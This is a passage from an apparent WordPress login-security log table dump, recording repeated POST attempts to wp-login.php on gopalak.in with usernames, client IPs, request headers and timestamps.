T_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746846097.3437049;s:12:\"REQUEST_TIME\";i:1746846097;}}','35.154.1.88',1,'2025-05-10 08:31:39','2025-05-11 10:08:13'),(95217,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51291\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746846097.343087;s:12:\"REQUEST_TIME\";i:1746846097;}}','35.154.1.88',1,'2025-05-10 08:31:39','2025-05-11 10:08:13'),(95218,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51289\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746846098.3639081;s:12:\"REQUEST_TIME\";i:1746846098;}}','35.154.1.88',1,'2025-05-10 08:31:39','2025-05-11 10:08:13'),(95219,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35706\";s:11:\"REMOTE_ADDR\";s:11:\"162.0.235.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746846453.5879409;s:12:\"REQUEST_TIME\";i:1746846453;}}','162.0.235.2',0,'2025-05-10 08:37:35','1970-01-01 00:00:00'),(95220,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65112\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746846827.7624969;s:12:\"REQUEST_TIME\";i:1746846827;}}','35.154.1.88',1,'2025-05-10 08:43:49','2025-05-11 10:08:13'),(95221,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65115\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746846827.7634799;s:12:\"REQUEST_TIME\";i:1746846827;}}','35.154.1.88',1,'2025-05-10 08:43:50','2025-05-11 10:08:13'),(95222,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65109\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746846829.526032;s:12:\"REQUEST_TIME\";i:1746846829;}}','35.154.1.88',1,'2025-05-10 08:43:51','2025-05-11 10:08:13'),(95223,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65118\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746846829.6044641;s:12:\"REQUEST_TIME\";i:1746846829;}}','35.154.1.88',1,'2025-05-10 08:43:51','2025-05-11 10:08:13'),(95224,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65122\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746846830.596468;s:12:\"REQUEST_TIME\";i:1746846830;}}','35.154.1.88',1,'2025-05-10 08:43:52','2025-05-11 10:08:13'),(95225,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56138\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.126.98\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746847066.4158089;s:12:\"REQUEST_TIME\";i:1746847066;}}','198.54.126.98',0,'2025-05-10 08:47:48','1970-01-01 00:00:00'),(95226,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61939\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746847555.783144;s:12:\"REQUEST_TIME\";i:1746847555;}}','35.154.1.88',1,'2025-05-10 08:55:58','2025-05-11 10:08:13'),(95227,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61936\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746847555.7822981;s:12:\"REQUEST_TIME\";i:1746847555;}}','35.154.1.88',1,'2025-05-10 08:55:58','2025-05-11 10:08:13'),(95228,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61944\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s: